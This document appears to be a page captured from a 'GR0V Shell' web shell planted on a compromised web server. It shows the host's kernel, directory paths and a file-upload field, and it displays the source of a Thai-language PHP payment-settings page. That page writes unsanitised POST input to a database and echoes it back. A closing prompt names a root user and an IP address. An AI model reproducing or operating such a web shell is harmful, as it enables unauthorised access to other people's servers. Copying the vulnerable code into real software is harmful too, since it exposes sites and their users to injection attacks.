? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/gall/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/gall/pay.php

<? include("template/header.php");?>
<div id="content">

<div id="box" align="left"   >
<h3>&#3585;&#3634;&#3619;&#3594;&#3635;&#3619;&#3632;&#3648;&#3591;&#3636;&#3609;</h3>
<?
if(isset($_POST[s_data])){
	$db->update_array("site",$_POST ,"s_name='payment'");
}
$res = $db->query("select * from site where s_name = 'payment'");
while($line = mysql_fetch_array($res)){
?>
<form id="form" action="" method="post" enctype="multipart/form-data" class="formular">
                      <fieldset id="personal">
                        <legend>&#3586;&#3657;&#3629;&#3617;&#3641;&#3621;&#3585;&#3634;&#3619;&#3594;&#3635;&#3619;&#3632;&#3648;&#3591;&#3636;&#3609;</legend>    
                        <label>
                        &nbsp;&#3649;&#3592;&#3657;&#3591;&#3594;&#3635;&#3619;&#3632;&#3612;&#3656;&#3634;&#3609;&#3607;&#3634;&#3591;&#3608;&#3609;&#3634;&#3588;&#3634;&#3619; / &#3648;&#3623;&#3621;&#3634; 
                        <textarea name="s_data" id="s_data"><?=$line[s_data]?>
                        </textarea>
                        <br />
                      </label>
                                            </fieldset>
                        <div align="center">
                      <input id="button1" type="submit" name="" value="submit" /> 
                      <input id="button2" type="reset" />
                      </div>
</form>
<? } ?>
</div>
             
</div>

      <? include("template/footer.php");?>

T1KUS90T
  root-grov@210.1.60.28:~$